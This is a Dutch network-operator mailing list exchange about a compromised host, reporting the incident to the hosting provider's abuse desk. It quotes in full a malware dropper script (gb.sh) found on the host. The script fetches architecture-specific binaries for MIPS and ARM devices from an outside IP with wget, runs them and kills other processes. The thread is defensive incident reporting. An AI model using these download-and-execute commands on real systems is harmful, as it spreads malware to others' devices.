Hi Sabri, Je zou even contact moeten opnemen met Rein of Baps van Ecatel. Ik heb hun abuse desk in cc: gezet. Geen idee of ze ook op de mailing list zitten. Mvg, Erik Bais Verstuurd vanaf mijn iPad Op 17 sep. 2015 om 05:43 heeft Sabri Berisha <sabri at cluecentral.net<mailto:sabri at cluecentral.net>> het volgende geschreven: Hi, Hebben we iemand van Ecatel (AS29073) op de lijst? We hebben een hakkertje op het net. Mijn huidige broodheer meldde het volgende: A script is installed (not sure how) in /tmp on the host, called gb.sh. Contents as follows: # cat gb.sh #!/bin/sh cd /tmp; wget -q http://89.248.174.106/pxmips; chmod 777 pxmips; ./pxmips; rm -f pxmips; killall -9 mips cd /tmp; wget -q http://89.248.174.106/pxmipsel; chmod 777 pxmipsel; ./pxmipsel; rm -f pxmipsel; killall -9 mipsel cd /tmp; wget -q http://89.248.174.106/pxarm; chmod 777 pxarm; ./pxarm; rm -f pxarm; killall -9 armv5l 89.248.174.106 appears to be based in the Netherlands somewhere, and is on many internet blacklists. Any idea what that is? The host is successfully able to retrieve the px* apps, but they do not run properly. Thanks, Sabri _______________________________________________ NLNOG mailing list NLNOG at nlnog.net<mailto:NLNOG at nlnog.net> http://mailman.nlnog.net/mailman/listinfo/nlnog